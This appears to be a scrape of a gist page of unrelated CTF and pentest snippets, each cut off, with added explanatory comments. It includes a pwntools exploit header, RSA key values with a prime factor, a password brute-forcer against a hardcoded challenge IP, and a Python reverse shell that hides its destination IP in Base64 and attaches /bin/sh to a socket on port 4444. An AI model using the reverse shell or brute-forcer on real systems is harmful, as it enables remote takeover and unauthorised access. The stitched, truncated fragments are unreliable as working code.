from pwn import *
# pwntools global context: the target is 64-bit x86 Linux.
context(arch='x86_64', os='linux')
# Command pwntools uses to open a new terminal (e.g. for a debugger):
# a tmux split-window with the -h flag.
context.terminal = ['tmux', 'splitw', '-h']
# Run-mode switches. Only the first lines of the script are visible, so how
# they are consumed is not shown; presumably LOCAL / REMOTETTCP / REMOTESSH
# select how the target is reached and GDB toggles a debugger -- confirm below.
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
GDB = False
# Path of the local binary, relative to the working directory.
local_bin = "./climb"
#!/bin/sh
# -----------------------------------------------------------------------------
# Author: @tunelko
# Modifier: DiaLluvioso
# -----------------------------------------------------------------------------
# Useful during the information-gathering phase of a pentest.
# Displays a formatted HTML report generated by xalan.
# Note: requires xalan (XML-to-HTML converter); it is installed if missing.
# -----------------------------------------------------------------------------
# * Change nmap arguments as needed !
tunelko / weird_encodings.py
Last active January 10, 2020 21:35
weird_encodings
import base64
import sys
# Command-line inputs, read without validation: a missing argument raises
# IndexError before anything else runs.
# pt: the text to process (presumably the plaintext -- confirm against the rest of the script).
pt = sys.argv[1]
# type_encoding: selects the encoding variant; the accepted values are not visible here.
type_encoding = sys.argv[2]
# Four 65-character tables named after the ATOM-128, MEGAN-35, ZONG22 and
# HAZZ-15 schemes. Each appears to be a reordering of the Base64 character set
# (A-Z, a-z, 0-9, '+', '/') plus '=', so they are presumably substitution
# alphabets applied to Base64 text -- confirm against the code that uses them.
# NOTE(review): a fixed, published alphabet is an encoding, not encryption;
# it provides no confidentiality.
atom128 = "/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC"
megan35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5"
zong22 = "ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2"
hazz15 = "HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5"
#!/usr/bin/python
import pyasn1.codec.der.encoder
import pyasn1.type.univ
import base64
# RSA values present in key.pem.
# e: public exponent, 0x010001 == 65537.
e = 0x010001
# n: modulus, 128 hex digits = 512 bits. A modulus this short is far below the
# 2048-bit minimum generally recommended for RSA and should be treated as
# breakable; keys of this size must not protect real data.
n = 0xC4B07FEFC8E36C05C0DA434221AEBF47DBF70E5189AD892408F3AD81182A9E0700A07C9D7C66C86C7A39602123EE0F605613DE97FDE49FE68396EE0AF3F5F5F3
# p: 78-digit decimal value, presumably one prime factor of n -- the listing
# ends before it is used, so confirm against the rest of the script.
p = 106173580239682931389627142547722999257831171755485751420548914984291463023277
import base64
import socket,subprocess,os
# Reverse-shell pattern: the host opens an outbound TCP connection and attaches
# an interactive shell to it. Annotated here for recognition and detection.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# The destination host is stored Base64-encoded ("base64_str_IP" is a
# placeholder); the port is fixed at 4444. The encoding only hides the address
# from plain string matching, so decode Base64 literals when triaging scripts.
s.connect((base64.b64decode("base64_str_IP"),4444))
# Redirect stdin (0), stdout (1) and stderr (2) to the socket.
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# Start an interactive /bin/sh, which inherits those descriptors.
# Detection cue: a shell whose standard descriptors are a network socket,
# spawned by an interpreter immediately after an outbound connect.
p=subprocess.call(["/bin/sh","-i"])
import socket
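# Destination of the frame: a TCP service on the loopback interface.
TCP_IP = '127.0.0.1'
TCP_PORT = 9999
# Not used in the lines shown; kept for any later code that reads a reply.
BUFFER_SIZE = 1024
# 28-byte payload: 0x68, length 0x16 (22) given twice, 0x68, then 22 bytes, a
# checksum byte 0x96 (the sum of those 22 bytes modulo 256) and a final 0x16.
# NOTE(review): this layout resembles an FT1.2 variable-length frame as used by
# IEC 60870-5-101 / M-Bus; the page does not name the protocol -- confirm.
data = b"\x68\x16\x16\x68\x08\x00\x65\x81\x65\x00\x64\x00\x01\x01\x00\x1a\xb5\x13\x8b\x57\x07\x12\x00\x00\x00\x00\x96\x16"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((TCP_IP, TCP_PORT))
    # sendall() keeps writing until the whole payload is out; send() may
    # transmit only part of it and return the number of bytes written.
    s.sendall(data)
finally:
    # Release the descriptor even when connect() or sendall() raises.
    s.close()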
tunelko / webwob.py
Created August 27, 2016 10:16
idsecconf CTF 2016 - web100
#!/usr/bin/env python
import requests
import string
import re
# Candidate character set: A-Z, a-z and 0-9 (62 characters).
alpha=string.ascii_uppercase+string.ascii_lowercase+string.digits
# Challenge endpoint; the value to test goes in the "password" query parameter.
# The URL is plain HTTP, so guesses and responses travel unencrypted.
url='http://128.199.96.39/?password='
# Matches the text "invalid " followed by one digit in a response.
# NOTE(review): presumably the digit varies with the guess; if so, the error
# message acts as an oracle. The defensive fix is a single uniform failure
# response plus rate limiting -- confirm against the rest of the script.
m = re.compile('invalid [0-9]')
# Working guess: a list of four characters, all initialised to 'a'.
password = ['a']*4
#!/bin/bash
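# Create 45 random flags. Each 16-byte hex value is generated once, appended
# to the "passwords" index as "<n>: <hex>", and written to the matching flag
# file as "flag{<hex>}". Keeping the value in a variable means the flag file
# never depends on re-reading the whole index (which grew with every
# iteration) or on word splitting of the cut output.
# NOTE(review): "passwords" holds every flag in cleartext in the current
# directory; make sure its location and permissions are restricted.
for flags in {1..45}; do
    secret="$(openssl rand -hex 16)"
    # The flag file is written only if the index line was appended.
    echo "$flags: $secret" >> passwords &&
        echo "flag{$secret}" > "/home/reto/flag_$flags.txt"
done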
gdb-peda$ b *0x0000000000400824
Breakpoint 1 at 0x400824
gdb-peda$ disassemble main
=> 0x0000000000400824 <+212>: je 0x400855 <main+261>
gdb-peda$ run
RBX: 0x7fffffffe238 ("TH1S 1s s3cr3t!!")
..
..
Breakpoint 1, 0x0000000000400824 in main ()
#!/usr/bin/env python
import argparse
# from skeleton.users import models
# from sqlalchemy.exc import SQLAlchemyError
# from collections import Counter
import json
import sys
import requests
"""